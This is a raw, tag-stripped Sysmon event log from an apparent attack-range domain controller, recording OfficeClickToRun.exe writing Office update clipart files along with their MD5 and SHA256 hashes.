Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02039_.GIFMD5=E6EF67833D7E7731B875BCEE213FF7C2,SHA256=BD1092E6F9B1DD719ED10F9CCB39BCA767F315250F3A1FEBA64444C03E2AD263,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB01741L.GIFMD5=6803624CB2CEEBD4F6B952D58F9D4567,SHA256=0F886AEA7986514748DE0131758C87E23A71591D8C254180E45A8B0C2E3E4077,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB00780L.GIFMD5=4F1A733D3E5266BE970493E55564A8BD,SHA256=182437785D97A81100FBE5172B15A12052FE5AD82FD2DFD48B09FC4BCBBF0447,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB00760L.GIFMD5=8B6F69F7F16E2D3E3D856DA1A1C12C8A,SHA256=55CEEF05D4505D20F7230C1F01DB5509F004AE0F402BC977DC89C9B3C73581CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB00703L.GIFMD5=AAC9D0F1865B924160D43C1DE3EFB873,SHA256=18F22F8CBC2BF362010D2046B1FF7ACE5C12224DF34826F38EFD28B44C0B78BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB00673L.GIFMD5=18264DE9A0AFF8CF42C18B475666551C,SHA256=2C1E0C5ACF419C7F4BE559601DA09557EB7D410A62A4C0DD02F8111085A76B16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB00531L.GIFMD5=2D5E62E796C9FE943AA7209A5B1D5CED,SHA256=0D0DFBEC1CCF27A665648E0D06D5E5F01CA13706E88335D489E02F113DBD1AC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB00516L.GIFMD5=60FD036F59962E477AE4415768C84A0B,SHA256=701E3E0D99FEECB27C03E2CF603EB40DCB5481533A0378A4EA0BE41D0852E9A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\J0143758.GIFMD5=424ECE0917562F82AE9834EFB896F832,SHA256=EE73010AC473A4364B3F87DC51571CC50624764AB955281941942449E460C94D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\J0143754.GIFMD5=AB6BA80CB8072CE73DB9253C26A356CF,SHA256=6DA0D2772DBD674D6B2150CE9746200FF5CFE86F89CF4BE838040420132443E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\J0143753.GIFMD5=B5D8BAEE15FDAAB5E3C8F6FB54F61C4F,SHA256=0034B0AE58E3D9172C4B81A3582B6947E77EE8962E6B502004C71C2B2E59B829,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\J0143752.GIFMD5=8136F3EAB1DB3DD4AD1E58112EE82971,SHA256=49C5003CE371329E586F4B32A911869EDDC2F2FA2FEE8B6B5561A96D9ECB0965,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\J0143750.GIFMD5=14C37D5F96E81DAEFD181A1841169854,SHA256=B52722452896C431DD817C6132B01FDA49D0B3B315770742C6B86A3369747F42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\J0143749.GIFMD5=B575E0FAAE606ABA9EF297348F61B963,SHA256=7C3CD555CC41E1A323432AEB07F0999CE05DF72B561710637447EDF8A5943531,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\J0143748.GIFMD5=09B510CB02B7AF2AE0757F7DA93160AF,SHA256=BC6E383641CE590B60844B0F8750D72DE64549E5D3552D7546B039F5D4C88E35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\J0143746.GIFMD5=DDBB967D45AFC2978E9E0FB5296525C1,SHA256=9292759F812917D33F79E0356CF5758DA483484092A94359272C6BCBBD1465DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\J0143745.GIFMD5=3FC965DBD83EFABDBA3552128A447011,SHA256=231CF735FB879DD640123B361509E4C9F2576E3E9A3F7C93667997DE6597D57C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\J0143744.GIFMD5=82204A2E9D87F484DF6A53C94FB01CA6,SHA256=E331E71D49D69D49162467028369D9F42089731A7B05E9863EE8E39A5A452A76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\J0143743.GIFMD5=AB84EC1FB7DC6FAE1666134D47DA5CCE,SHA256=CCD61AC5B0EEDD45BC8236E4A79997821F099C7BBB3879A7D1D80B16FD3A67C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WNTER_01.MIDMD5=7901A60C290E660E75811586A5660EE3,SHA256=BA8818AF350D976ED7679D879A7A93FCAD882D2D39527F524DF67F8FD1011DC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WING2.WMFMD5=6FE505A9074CA56BDE445FEC5C9CE201,SHA256=A2C769D89104A24C90E304FB3BB8B60C27A4BEE0E2048FDFEF5C7E1AC6F11B18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WING1.WMFMD5=4014974338010D2774CFBCDB3080B59F,SHA256=4D858076E5623CCD182D8605C1A648C3262D3BDEB8FA795FD64BB67D6128E3F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WHIRL2.WMFMD5=C41CD10A7912FB6F14423EA19CE39BEB,SHA256=FAEC7248AF7099DB6BB8B44E0951B2E765389F3E4FC995BAA691458FCA662AAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WHIRL1.WMFMD5=B49D7096B397B8425172A693665A1B97,SHA256=0FCAFB52B6EE282760A4AC06FDC6A8EEEB08720C98D7C021A253B4E4E7114E97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB02229_.GIFMD5=C1F76A45AD09920E755D330CE3E0431C,SHA256=E5FC5F13500C08A8C51843E9CB6E6012DBFFA3ED7B737803F212754B3D4B6253,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01843_.GIFMD5=3BA845D2772AA95DF4836C95362251A4,SHA256=7EA82DB9AAB0A9C78017C20112E0C9B12FE58D635EC27A7D47137B72B16DAE96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01842_.GIFMD5=D7FB84645BCC6290338D3D0D06947B16,SHA256=0C5B2B56BD92ACA2E38B2C1A8CF6C0531DF1DBF41952AB084F5823E99A345177,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01840_.GIFMD5=BF5FA3175269919CE8FCF7A90731CCB9,SHA256=0925FAAEB5D67A328CD6DB32515FB12C11E7A16CF2397EE3164F11328861C68B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01839_.GIFMD5=55112102C8B1394D7E64D745E6554241,SHA256=E4BDC55CAE60A8AA2555FD6A9EAD5BB32BC6B14856A9068577709FD2782FA496,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01838_.GIFMD5=589E1FA0DEDC120C040745EA1B712450,SHA256=FE3CE8949FC17508A754993D52DDD077B18956F81B00811578354ECBBC062821,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01770_.GIFMD5=27308A2395F13F9BFEEA1CCEE7164BA8,SHA256=5F0AF2D3A33EB652E60786CA1F3710BCDCC0D84B1134E9FDAD7ABF0FF3C11F2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01751_.GIFMD5=EB13B1004A208B6C6DB26A0774D9A546,SHA256=67B8DF11825CA6D71484AF97EE5D011D64F5F6BA5C6E81011A3B9796B4C500CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01750_.GIFMD5=CA3CE416759B147826780272D7915FD7,SHA256=198E46D595F14FD287DD68B009CA3165B619EF272BFB1D35BFF14ECD2179A43C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01749_.GIFMD5=CC3F75480A4A01365E903AA5185E9300,SHA256=B03891D7D399A4424FAE4A6B56598A30E0DEA1210909F26459F0AE10722CF58E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01748_.GIFMD5=15ABAE734A9B08BBA229CA01473F6259,SHA256=E7315EA314EA13026F5405CFA063E6FF08431E2B274FA061CD3BA350A86AF8B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01747_.GIFMD5=6BDE269B3002A8389BC4E5526A132BBE,SHA256=94D3527839C4F6A0C5617F1D7740DF9735903FACC197E167D73210AAC669F54E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01746_.GIFMD5=54AA1B72E82E73A09036754AE5F1DCDC,SHA256=E6BF68E06E24713D9E3CD5E01E1041B823A2D32C7E4E564CF2665F4A8525B7BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01745_.GIFMD5=A9CEB2345C0E4BACA4C1F3019694D4A8,SHA256=CDEC2D0B29C8DB5A298F635D7D3F11AF29F1B4CEC1DB39DAF320F7167328E768,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01744_.GIFMD5=395E433937FE012962B31BAE21444685,SHA256=48EE6764562ED5F95D38292042A230E578A23F7421764C31DEE0C821E93EAC21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01743_.GIFMD5=0294B6FFFD9B3AC8F84E4FD5B70AC3AE,SHA256=3E717D8B950601D8E96E58108D84954BE92289855AB75534220A361FEABA253D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01742_.GIFMD5=22601C31608AAE80D5414D06A9A3580A,SHA256=7E3486E201A1D92151B099EA142B7223F8C71891C58B64CB0E3E650D3BA7A7CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01740_.GIFMD5=7AACFFC29256C493156504D4E0178747,SHA256=28A12A6CB90D4D1F77EFC885BB5B89E6DE8CD4D27278A9536AEF7CE6EC084C87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01734_.GIFMD5=3FE849008773E418D53DFD732FCF77FC,SHA256=1DC46B67C5001C5EBCF5BD1AF8C8DE4918BC143B68A47E0D939B7108A74C74F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01330_.GIFMD5=8B8FF838C7FA78C82B1F5B0B7A080268,SHA256=CDBB7D962D3E618EF8E1A1DD3EA1032E021C5322C39A816CDFF82216D95956EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\WB01304G.GIFMD5=06784463052DFED981C8B51AEC3EF273,SHA256=57467C83708C4B4992FB6A8B4FD1921557121CB5F43CBAD5BB903D4A266C2A6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 